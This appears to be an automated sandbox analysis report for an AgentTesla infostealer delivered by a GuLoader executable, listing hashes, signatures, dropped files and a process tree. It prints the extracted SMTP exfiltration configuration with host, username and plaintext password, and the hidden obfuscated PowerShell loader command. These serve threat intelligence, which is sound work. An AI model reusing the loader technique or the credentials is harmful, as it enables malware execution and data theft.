Analysis
-
max time kernel
146s -
max time network
144s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
30-03-2024 01:30
Static task
static1
Behavioral task
behavioral1
Sample
00db117ca052e69bb2cde67e8fafab75c786c5f064a43537a4cbfcd6a2366ca3.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
00db117ca052e69bb2cde67e8fafab75c786c5f064a43537a4cbfcd6a2366ca3.exe
Resource
win10v2004-20240319-en
Behavioral task
behavioral3
Sample
Pyrograph/Perikoner/Intermeasuring199/Skibshandlernes.ps1
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
Pyrograph/Perikoner/Intermeasuring199/Skibshandlernes.ps1
Resource
win10v2004-20240226-en
General
-
Target
00db117ca052e69bb2cde67e8fafab75c786c5f064a43537a4cbfcd6a2366ca3.exe
-
Size
838KB
-
MD5
3487fcccd1544dbabaa2144ab6d5807a
-
SHA1
ac8d5d7724691faae52f3ab84b42732577b9f7eb
-
SHA256
00db117ca052e69bb2cde67e8fafab75c786c5f064a43537a4cbfcd6a2366ca3
-
SHA512
407ee5a94db98c03e8df9fd25f4caa4b70eb8d279b136cb8f65372065f6468a785880f9245c67e385017b0835c7c97f0f5eb248a48e7d887c0824181af5c0757
-
SSDEEP
12288:5nPdE2I8+NVtZJ4wCI6fndjQ079Y3d5p5mw9:lPdE2j2tZOfaE+Xp3
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
cp8nl.hyperhost.ua - Port:
587 - Username:
[email protected] - Password:
7213575aceACE@#$ - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
wab.exepid process 2664 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 2832 powershell.exe 2664 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2832 set thread context of 2664 2832 powershell.exe wab.exe -
Drops file in Program Files directory 1 IoCs
Processes:
00db117ca052e69bb2cde67e8fafab75c786c5f064a43537a4cbfcd6a2366ca3.exedescription ioc process File opened for modification C:\Program Files (x86)\Common Files\Mbenede184\sparple.Bnd22 00db117ca052e69bb2cde67e8fafab75c786c5f064a43537a4cbfcd6a2366ca3.exe -
Drops file in Windows directory 1 IoCs
Processes:
00db117ca052e69bb2cde67e8fafab75c786c5f064a43537a4cbfcd6a2366ca3.exedescription ioc process File opened for modification C:\Windows\Stainlessly\Retlinedes.jag 00db117ca052e69bb2cde67e8fafab75c786c5f064a43537a4cbfcd6a2366ca3.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
powershell.exewab.exepid process 2832 powershell.exe 2832 powershell.exe 2832 powershell.exe 2832 powershell.exe 2832 powershell.exe 2832 powershell.exe 2832 powershell.exe 2832 powershell.exe 2664 wab.exe 2664 wab.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 2832 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exewab.exedescription pid process Token: SeDebugPrivilege 2832 powershell.exe Token: SeDebugPrivilege 2664 wab.exe -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
00db117ca052e69bb2cde67e8fafab75c786c5f064a43537a4cbfcd6a2366ca3.exepowershell.exedescription pid process target process PID 2344 wrote to memory of 2832 2344 00db117ca052e69bb2cde67e8fafab75c786c5f064a43537a4cbfcd6a2366ca3.exe powershell.exe PID 2344 wrote to memory of 2832 2344 00db117ca052e69bb2cde67e8fafab75c786c5f064a43537a4cbfcd6a2366ca3.exe powershell.exe PID 2344 wrote to memory of 2832 2344 00db117ca052e69bb2cde67e8fafab75c786c5f064a43537a4cbfcd6a2366ca3.exe powershell.exe PID 2344 wrote to memory of 2832 2344 00db117ca052e69bb2cde67e8fafab75c786c5f064a43537a4cbfcd6a2366ca3.exe powershell.exe PID 2832 wrote to memory of 2516 2832 powershell.exe cmd.exe PID 2832 wrote to memory of 2516 2832 powershell.exe cmd.exe PID 2832 wrote to memory of 2516 2832 powershell.exe cmd.exe PID 2832 wrote to memory of 2516 2832 powershell.exe cmd.exe PID 2832 wrote to memory of 2664 2832 powershell.exe wab.exe PID 2832 wrote to memory of 2664 2832 powershell.exe wab.exe PID 2832 wrote to memory of 2664 2832 powershell.exe wab.exe PID 2832 wrote to memory of 2664 2832 powershell.exe wab.exe PID 2832 wrote to memory of 2664 2832 powershell.exe wab.exe PID 2832 wrote to memory of 2664 2832 powershell.exe wab.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\00db117ca052e69bb2cde67e8fafab75c786c5f064a43537a4cbfcd6a2366ca3.exe"C:\Users\Admin\AppData\Local\Temp\00db117ca052e69bb2cde67e8fafab75c786c5f064a43537a4cbfcd6a2366ca3.exe"1⤵
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2344 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Ettled=Get-Content 'C:\Users\Admin\AppData\Local\indenrigsministeren\fortepianoer\demoralismrr\Pyrograph\Perikoner\Intermeasuring199\Skibshandlernes.Ove218';$glansrollen=$Ettled.SubString(20367,3);.$glansrollen($Ettled)"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2832 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"3⤵PID:2516
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2664
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
68KB
MD529f65ba8e88c063813cc50a4ea544e93
SHA105a7040d5c127e68c25d81cc51271ffb8bef3568
SHA2561ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
-
C:\Users\Admin\AppData\Local\indenrigsministeren\fortepianoer\demoralismrr\Pyrograph\Perikoner\Intermeasuring199\Gusting.Van
Filesize312KB
MD5a7cab46a4e5fef5e54b62991146ac55e
SHA15edbaf546783cabbc1925720dd173c94d239e670
SHA256deeefe5b493c1c1e3de5d3102e81be4571b50cf583439e0688dac308104eefbb
SHA51267cb25ea7ccab21f223e44e7bad5ced5d2af4d17f58e4474537055f9c613db19cda1251990c5e52b3d507bfca163d42c246a8028225f89b3ab2053ba24a57b50
-
C:\Users\Admin\AppData\Local\indenrigsministeren\fortepianoer\demoralismrr\Pyrograph\Perikoner\Intermeasuring199\Skibshandlernes.Ove218
Filesize58KB
MD5161d266563cfa870571bd2a76a200777
SHA14dad793c0fc2ff315bd201e80cf414864bea5409
SHA25633095bc104b3928f5a857d2572be6afe3b9890ae110cd9aaf52ceb6a29e943fd
SHA512430418fa2d550afd8f616420020c1c3d452488d45ba0d0d1b1a296ecc21eca816810872adce077612f12f88a1130c111560cba48b6286f06fb9ac6305729980a